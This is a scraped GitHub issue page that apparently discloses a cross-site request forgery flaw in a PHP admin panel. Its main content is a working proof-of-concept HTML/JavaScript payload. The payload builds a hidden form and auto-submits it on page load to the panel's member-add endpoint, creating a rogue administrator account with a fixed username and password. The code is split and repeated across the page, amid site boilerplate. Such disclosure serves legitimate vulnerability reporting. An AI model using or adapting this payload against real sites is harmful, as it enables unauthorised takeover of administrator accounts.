We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
After the administrator logged in, open the following two page:
save in payload.html,add administrator
function csrf_hack() { var fields; fields += "<input type='hidden' name='username' value='hack123' />"; fields += "<input type='hidden' name='password' value='hacktest' />"; fields += "<input type='hidden' name='repassword' value='hacktest' />"; var url = "http://127.0.0.1/admin.php?m=Member&a=adminaddsave"; post(url, fields); } window.onload = function () { csrf_hack(); }
The text was updated successfully, but these errors were encountered:
No branches or pull requests
After the administrator logged in, open the following two page:
save in payload.html,add administrator
<title>Title</title> <script type="text/javascript"> function post(url, fields) { var p = document.createElement("form"); p.action = url; p.innerHTML = fields; p.target = "_self"; p.method = "post"; document.body.appendChild(p); p.submit(); }The text was updated successfully, but these errors were encountered: